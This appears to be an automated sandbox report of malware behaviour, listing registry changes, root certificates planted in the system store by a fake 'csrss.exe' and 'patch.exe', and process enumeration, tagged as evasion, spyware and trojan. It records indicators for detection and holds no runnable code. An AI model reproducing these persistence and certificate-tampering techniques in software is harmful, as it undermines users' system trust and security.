Set value (data) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002e1e81ecbc95de49994f369c3e717184000000000200000000001066000000010000200000000c93e76ff72fd5ef94e2d666fbd188b4c9e175a976c7f47b5213dbd2a7192354000000000e80000000020000200000008ba254d0cc20fda644d40af8e00cbb5f83075136a4d3a76b0b64542ca3d5993490000000c00ea32b1c6d6e150741b2a65af5ab567c0d69443a1dfb6f62838487ae0c7c5121a20bff6e771f371c4a4aa8307d4b88f4705f22f68bc66cb4481035710419c0786b01ec953472cfb212e79fe846dfe7c60cd9c9c1432059dd768e01785eecd78f987e0e7f8d27c45b87bf84fcbce23a7ef55adf76d45be401ed1a17d4bb24fa12c4a1ad0fe8f5514589562e170c1356400000008c7cf98edf9cf12de5515f980c6b196d90a84b1027c3f0e1743b4c6adbe6753cc6cc761181dab837027df8c6e89a1bf75a5a7ebce908cde51639575230b676da C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002e1e81ecbc95de49994f369c3e71718400000000020000000000106600000001000020000000917ec9c3c9bacad502bb682259c49b17a7ad61f669fbd98e245d351f627d320e000000000e8000000002000020000000940c372636112fd0204613537486a90bb114fd6ff5d26c0f6f5734e343bf9466200000004aacc15594d1434d2dc067f460043ff70f9627e0f534e262508c2c4000f740c2400000006986088479b33ad481312f0760cc1e2306af86b0b00945eb6e35f873fd0d5dde721984a2e34368a83766220827785843f82f3c22b3f8f0ed6e5ce03a1b99c929 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4271BB11-779B-11EE-B466-42BF89FD39DA} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 706e3d40a80bda01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
